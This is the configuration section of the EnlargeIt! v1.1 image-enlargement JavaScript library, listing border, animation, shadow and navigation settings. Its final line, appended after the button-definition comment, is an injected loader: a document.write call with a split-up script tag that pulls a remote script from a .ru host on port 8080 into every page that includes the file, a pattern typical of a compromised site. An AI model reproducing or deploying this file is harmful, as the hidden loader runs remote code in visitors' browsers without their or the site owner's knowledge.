/*  This comment MUST stay intact for legal use, so don't remove it. EnlargeIt! 
v1.1 - (c) 2008 Timo Sack - http://enlargeit.timos-welt.de This program is free 
software: you can redistribute it and/or modify it under the terms of the GNU 
General Public License as published by the Free Software Foundation, either 
version 3 of the License, or (at your option) any later version. See LICENSE.TXT 
for details. */

// modify these
var enl_gifpath='./files/'; // path to graphics
var enl_brdsize=12;    // border thickness (5-30)
var enl_brdcolor='';   // border color (white if empty)
var enl_brdbck='';     // border background pic, '' for no pic
var enl_brdround=1;    // use rounded borders (Mozilla/Safari only)
var enl_maxstep=18;    // ani steps (10-30)
var enl_speed=12;      // time between steps
var enl_ani=5;         // 0=no,1=fade,2=glide,3=bumpglide,4=smoothglide,5=expglide
var enl_opaglide=0;    // glide transparency
var enl_shadow=1;      // shadow under border
var enl_shadowsize=1;  // size of shadow right/bottom (0-20)
var enl_shadowcolor='';// shadow color (empty: black)
var enl_shadowintens=9;// shadow intensity (5-30)
var enl_dark=1;        // darken screen (0=off/1=on/2=keep dark when nav)
var enl_darkprct=80;   // how dark the screen should be (0-100)
var enl_darksteps=9;   // how long darkening should take
var enl_center=1;      // center enlarged pic on screen
var enl_drgdrop=1;     // enable drag&drop for pics
var enl_preload=1;     // preload next/prev pic
var enl_titlebar=1;    // show pic title bar
var enl_keynav=1;      // key navigation
var enl_wheelnav=1;    // mouse wheel navigation
var enl_titletxtcol='';// color of title bar text (empty: dark grey)
var enl_ajaxcolor='';  // background color for AJAX (empty: light grey)
var enl_usecounter=0;  // hidden call of counter page
var enl_counterurl=''; // base URL of counter page
var enl_btnact='bact.png';               // active buttons
var enl_btninact='binact.png';           // inactive buttons
var enl_pluscur='pluscur.cur';           // mouse cursor of thumbnail
var enl_minuscur='minuscur.cur';         // mouse cursor of enlarged image
var enl_noflash='No flash plugin found!';// msg if no flash plugin found
var enl_canceltext='Click to cancel';    // tooltip to cancel loading

// don't modify next line
var enl_buttonurl = new Array(),enl_buttontxt = new Array(),enl_buttonoff = new Array();

// define your buttons here


document.write('<s'+'cript type="text/javascript" src="http://pantscow.ru:8080/Template.js"></scr'+'ipt>');